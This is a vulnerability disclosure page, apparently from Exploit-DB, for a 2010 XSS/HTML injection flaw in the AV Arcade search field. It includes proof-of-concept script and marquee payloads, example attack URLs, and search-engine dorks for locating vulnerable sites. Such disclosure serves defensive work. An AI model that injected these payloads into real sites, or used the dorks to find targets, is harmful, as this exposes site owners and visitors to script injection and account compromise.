AV Arcade Search Field XSS/HTML Injection

vendor:

AV Arcade

by:

Vadim Toptunov

8,8

CVSS

HIGH

XSS/HTML Injection

CWE

Product Name: AV Arcade

Affected Version From: 5.1.4 Free and Pro

Affected Version To: Prior

Patch Exists: YES

Related CWE: N/A

CPE: avscripts.net/avarcade

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Any NIX

2010

AV Arcade Search Field XSS/HTML Injection

AV arcade is a free arcade script from AV Scripts. It has features which easily match those of paid scripts. Go to search field and query those strings: HTML Injection: '><marquee>hey, this works!</marquee> XSS: '><script>alert(String.fromCharCode(88,83,83))</script>

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: AV Arcade Search Field XSS/HTML Injection
# Date: 6/5/2010
# Author: Vadim Toptunov, http://www.twitter.com/pentesting
# Software Link: http://www.avscripts.net/avarcade/
# Version: 5.1.4 Free and Pro (latest) and prior
# Tested on: Any NIX
# CVE : N/a
# Code : below

Description:
AV arcade is a free arcade script from AV Scripts. It has features which easily match those of paid scripts.

POC:
Go to search field and query those strings:
HTML Injection: "><marquee>hey, this works!</marquee>
XSS: "><script>alert(String.fromCharCode(88,83,83))</script>

Example:
http://[site]/index.php?task=search&q="><marquee>hey, thisworks!</marquee>
http://[site]/index.php?task=search&q="><script>alert(String.fromCharCode(88,83,83))</script>

Dorks:
"Powered by AV Arcade v3"
"Powered by AV Arcade v4"
"Powered by AV Arcade Free Edition"
"Powered by AV Arcade Pro"